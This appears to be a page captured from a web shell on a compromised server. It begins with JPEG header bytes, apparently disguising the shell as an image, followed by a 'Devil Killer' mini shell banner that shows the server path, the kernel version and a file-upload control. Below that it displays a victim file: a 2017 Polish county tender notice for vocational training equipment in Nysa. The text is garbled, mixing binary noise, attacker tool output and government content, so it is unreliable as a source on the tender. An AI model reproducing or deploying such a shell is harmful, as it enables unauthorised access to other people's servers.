JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170418/67990-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.spnysa.nv.pl' target='_blank'>http://bip.spnysa.nv.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 67990 - 2017
              z dnia 2017-04-18 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nysa: Zakup, dostawa i montaż wyposażenia do Rozbudowy Centrum Kształcenia Zawodowego i Ustawicznego w Nysie przy ul. Orkana 6 w ramach zadania: Wsparcie kształcenia zawodowego w kluczowych dla regionu branżach 

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Dokument dot. realizacji projektu pn.: Wsparcie kształcenia zawodowego w kluczowych  dla regionu branżach (nr decyzji o dofinansowaniu RPOP.10.04.00-16-0001/16-00), dofinansowany z Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2014-2020. </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Starostwo Powiatowe w Nysie, krajowy numer identyfikacyjny
              53141222000000, ul.
              Piastowska 
              33,
              48-300  
              Nysa, woj.
              opolskie, państwo
              Polska, tel.
              774 085 065, e-mail
              zamowienia.publiczne@powiat.nysa.pl, faks
              774 085 065.
              <br />
              Adres strony internetowej (URL): http://bip.spnysa.nv.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.spnysa.nv.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.spnysa.nv.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Starostwo Powiatowe w Nysie, ul. Piastowska 33, 48-300 Nysa - Biuro Obsługi Klienta </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup, dostawa i montaż wyposażenia do Rozbudowy Centrum Kształcenia Zawodowego i Ustawicznego w Nysie przy ul. Orkana 6 w ramach zadania: Wsparcie kształcenia zawodowego w kluczowych dla regionu branżach 

<br /><b>Numer referencyjny: </b>IP.272.2.14.2017.KM<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b><br /><br /><b>II.5) Główny kod CPV: </b><br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                DLA CZĘŚCI I:
1. W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej dwie dostawy polegające  na dostawie stanowisk dydaktycznych OZE zarządzanych zdalnie z systemem typu SCADA, za kwotę nie mniejszą niż 140 000,00 zł brutto każda, przy czym dostawa musi zawierać co najmniej następujące elementy:
a) stanowisko dydaktyczne z instalacją fotowoltaiczną i turbiną wiatrową
b) stanowisko dydaktyczne z instalacją ciepłej wody użytkowej z kolektorami słonecznymi i pompą ciepłao podobnym zakresie do przedmiotu zamówienia,

            DLA CZĘŚCI II:
1. Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie                                  w postępowaniu restrukturyzacyjnym jest  przewidziane zaspokojenie  wierzycieli  przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r.  Prawo restrukturyzacyjne (Dz. U. z 2015 r. poz. 978, 1259, 1513, 1830 i 1844 oraz z 2016 r. poz. 615) lub którego upadłość ogłoszono, z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r.  Prawo upadłościowe (Dz.U. z 2015 r. poz. 233, 978, 1166, 1259 i 1844 oraz z 2016 r. poz. 615)  art. 24 ust. 5 pkt 1) ustawy Pzp;<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">DLA CZĘŚCI I:
1. W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej dwie dostawy polegające  na dostawie stanowisk dydaktycznych OZE zarządzanych zdalnie z systemem typu SCADA, za kwotę nie mniejszą niż 140 000,00 zł brutto każda, przy czym dostawa musi zawierać co najmniej następujące elementy:
a) stanowisko dydaktyczne z instalacją fotowoltaiczną i turbiną wiatrową
b) stanowisko dydaktyczne z instalacją ciepłej wody użytkowej z kolektorami słonecznymi i pompą ciepłao podobnym zakresie do przedmiotu zamówienia,

            DLA CZĘŚCI II:
1. Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Zobowiązanie innego podmiotu, na zasobach którego polega Wykonawca, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia. 
2. Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie. 
a) W przypadku podpisywania oferty przez osoby nie wymienione w odpisie                       z właściwego rejestru  pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy. 
b) W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp). 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin wykonania </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Istotne postanowienia umowne określa wzór umowy, stanowiący załącznik do SIWZ.
2. Zamawiający oświadcza, iż przewiduje możliwość istotnych zmian Umowy w stosunku do treści oferty, na podstawie określonych poniżej warunków:
a) wystąpienia okoliczności niezależnych od Wykonawcy, w tym na skutek działania siły wyższej,
b) zmiany regulacji prawnych obowiązujących w dniu zawarcia umowy , a mających istotny wpływ na realizację umowy, a w szczególności zmiany stawki podatku od towarów i usług,
c) zmiany danych teleadresowych Stron umowy określonych w umowie,
d) w przypadku zmian korzystnych dla zamawiającego.

